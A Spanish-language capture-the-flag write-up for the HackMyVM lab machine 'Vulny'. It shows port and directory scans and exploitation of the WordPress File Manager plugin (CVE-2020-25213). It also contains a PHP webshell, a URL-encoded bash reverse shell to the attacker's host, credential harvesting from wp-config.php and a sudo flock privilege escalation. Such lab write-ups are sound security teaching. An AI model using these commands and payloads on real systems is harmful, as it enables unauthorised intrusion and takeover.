cd ~/blog

~/writeups/hmv/094-vulny.md

094 - Vulny

easy Linux hmv 04-05-2024
WP File Manager Unauthenticated RCE (CVE-2020-25213)wp-config.php credential disclosuresudo flock Privesc
hackmyvm.eu/machines/machine.php?vm=Vulny

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS -n -Pn -oG 01-allPorts 192.168.1.32
 nmap -sCV -p80,33060 -oN 02-targeted.txt 192.168.1.32
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-04 13:32 -04
Nmap scan report for 192.168.1.32
Host is up (0.00028s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
33060/tcp open  mysqlx?
Service Info: ...

Enumeramos directorios y damos con /secret, una instalación de WordPress:

 ffuf -u 'http://192.168.1.32/FUZZ' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -e php,txt,html,jpg,jpeg,gif,png
...
secret                  [Status: 301, ...]
...

 gobuster dir -u 'http://192.168.1.32/secret' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,png,gif -r
...
/wp-content           (Status: 200) [Size: 1752]
/readme.html          (Status: 200) [Size: 7368]
...

En wp-content/uploads/2020/10/ hay un ZIP que revela el plugin instalado: wp-file-manager 6.0, vulnerable a RCE (CVE-2020-25213):

 searchsploit wp file manager
...
WordPress Plugin Wp-FileManager 6.8 - RCE | php/webapps/49178.sh
...

 ./49178.sh --wp_url http://192.168.1.32/secret --check
[+] Found wp-file-manager version: 6.0
[+] Version appears to be vulnerable
[+] Target: http://192.168.1.32/secret is vulnerable

Subimos una webshell PHP con el script del exploit:

 cat pwned.php
<?php
    system($_GET['cmd']);
?>

 ./49178.sh --wp_url http://192.168.1.32/secret -f .../pwned.php --verbose
...
[+] W00t! W00t! File uploaded successfully.
Location:  /secret/wp-content/plugins/wp-file-manager/lib/php/../files/pwned.php
...

 curl 'http://192.168.1.32/secret/wp-content/plugins/wp-file-manager/lib/files/pwned.php?cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Lanzamos una reverse shell:

http://192.168.1.32/secret/wp-content/plugins/wp-file-manager/lib/files/pwned.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.1.3/1234%200%3E%261%22

 ncat -nlvp 1234
Ncat: Connection from 192.168.1.32:49686.
bash: cannot set terminal process group (652): Inappropriate ioctl for device
bash: no job control in this shell
<ress/wp-content/plugins/wp-file-manager/lib/files$

En el wp-config.php encontramos la contraseña de adrian:

<ress/wp-content/plugins/wp-file-manager/lib/files$ cat /usr/share/wordpress/wp-config.php
...
/* idrinksomewater */
...

www-data@vulny:/home$ su adrian
Password: idrinksomewater
adrian@vulny:/home$

Obtenemos la primera flag. Revisamos sudo -l:

adrian@vulny:~$ sudo -l
...
User adrian may run the following commands on vulny:
    (ALL : ALL) NOPASSWD: /usr/bin/flock

flock permite ejecutar un comando bajo un lock; lo usamos para lanzar una bash de root:

adrian@vulny:~$ sudo flock -u / /bin/bash
root@vulny:/home/adrian#

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados